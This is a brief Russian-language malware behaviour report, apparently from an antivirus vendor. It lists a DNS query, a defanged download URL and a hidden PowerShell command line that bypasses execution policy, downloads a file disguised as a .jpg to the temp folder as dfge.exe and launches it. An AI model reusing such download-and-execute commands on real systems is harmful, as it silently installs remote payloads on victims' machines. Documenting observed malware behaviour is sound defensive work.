Техническая информация
- http://cr##trt.com/i7/9784100.jpg как %temp+%\dfge.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cr##trt.com/i7/9784100.jpg',$env:Temp+'\dfge.exe');(New-Object -com Shell.App...
- DNS ASK cr##trt.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cr##trt.com/i7/9784100.jpg',$env:Temp+'\dfge.exe');(New-Object -com Shell.App...' (со скрытым окном)